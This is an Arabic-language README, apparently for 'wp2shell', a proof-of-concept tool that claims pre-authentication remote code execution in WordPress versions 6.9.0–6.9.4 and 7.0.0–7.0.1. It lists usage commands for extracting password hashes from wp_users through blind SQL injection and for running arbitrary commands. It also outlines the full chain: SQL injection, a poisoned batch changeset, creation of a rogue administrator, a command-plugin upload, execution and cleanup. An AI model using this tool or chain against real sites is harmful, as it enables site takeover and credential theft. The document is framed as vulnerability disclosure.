
wp2shell — ثغرة تنفيذ برمجي عن بُعد (RCE) قبل المصادقة في نواة ووردبريس (CVE-2026-60137 + CVE-2026-63030). تجمع بين حقن SQL في author__not_in مع التباس توجيه الدُفعات (batch-route confusion) لتنفيذ برمجي عن بُعد دون مصادقة على الإصدارات WP 6.9.0–6.9.4 / 7.0.0–7.0.1.
| النطاق | الحالة |
|---|
| <= 6.8.5 | غير متأثر (لا يوجد التباس في الدفعة) |
| 6.8.0 - 6.8.5 | حقن SQL فقط، لا يوجد RCE |
| 6.9.0 - 6.9.4 | قابلة للاستغلال |
| 7.0.0 - 7.0.1 | قابلة للاستغلال |
| 7.0.2+ / 6.9.5+ | مُصلَّحة |
python3 poc.py -u TARGET_URL
python3 poc.py -u TARGET_URL --sql "SELECT user_pass FROM wp_users LIMIT 1"
python3 poc.py -u TARGET_URL -c "id"
| الوسائط | السلوك |
|---|---|
-u TARGET_URL | التحقق من قابلية الاستغلال (اختبار التوقيت) |
-u TARGET_URL --sql "SQL" | استخراج قيمة مفردة عبر SQLi الأعمى |
-u TARGET_URL -c "CMD" | سلسلة RCE كاملة |
/batch/v1) لتعطيل تزامن معالجة الطلبات وتجاوز المصادقةauthor_exclude عبر مؤشر توقيت SLEEP()التحقق من قابلية الاستغلال → بذر منشورات oEmbed → استخراج اسم الجدول (SQLi أعمى) → استخراج معرف المسؤول (SQLi أعمى) → استخراج معرفات منشورات ذاكرة التخزين المؤقت (SQLi أعمى) → حقن مجموعة تغييرات مسمومة عبر الدفعة → إنشاء مستخدم مسؤول → تسجيل الدخول → رفع إضافة الأوامر → تنفيذ الأمر → التنظيف
author__not_in: اكتشفه TF1T, dtro, haongo